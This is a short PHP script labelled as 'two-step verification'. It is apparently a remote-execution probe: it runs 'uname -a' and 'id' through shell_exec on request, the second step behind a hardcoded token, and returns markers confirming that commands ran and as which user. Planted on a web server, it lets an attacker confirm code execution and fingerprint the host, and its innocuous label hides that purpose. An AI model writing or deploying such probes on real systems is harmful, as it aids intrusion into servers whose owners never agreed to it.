<?php
// TWO-STEP VERIFICATION
// Step 1: Initial check (always returns simple response)
if(!isset($_GET['step'])) {
    echo "READY";
    exit();
}

$step = $_GET['step'];

if($step == '1') {
    // First verification: system info
    $output = @shell_exec("uname -a 2>&1");
    
    if(!$output) {
        echo "NO_OUTPUT";
        exit();
    }
    
    // Check if it's REAL output (not source code)
    $checks = array(
        'has_php_tags' => preg_match('/<\?php/', $output),
        'has_system_call' => preg_match('/system\(/', $output),
        'has_linux' => preg_match('/Linux/', $output),
        'has_windows' => preg_match('/Windows/', $output),
        'has_kernel' => preg_match('/\d+\.\d+\.\d+/', $output),
        'length_ok' => strlen(trim($output)) > 10
    );
    
    // Must have system indicators AND NOT have PHP code
    if((!$checks['has_php_tags'] && !$checks['has_system_call']) && 
       ($checks['has_linux'] || $checks['has_windows'] || $checks['has_kernel']) &&
       $checks['length_ok']) {
        echo "VERIFIED:" . substr(trim($output), 0, 100);
    } else {
        echo "UNVERIFIED";
    }
    
} elseif($step == '2') {
    // Second verification: actual command execution
    if(!isset($_GET['token']) || $_GET['token'] != 'exec_test_2025') {
        echo "INVALID_TOKEN";
        exit();
    }
    
    $cmd = "id 2>&1";
    $output = shell_exec($cmd);
    
    // Must have uid= or gid= pattern (real command output)
    if($output && preg_match('/uid=\d+\(\w+\)/', $output)) {
        echo "EXEC_CONFIRMED:" . trim($output);
    } else {
        echo "EXEC_FAILED";
    }
}
?>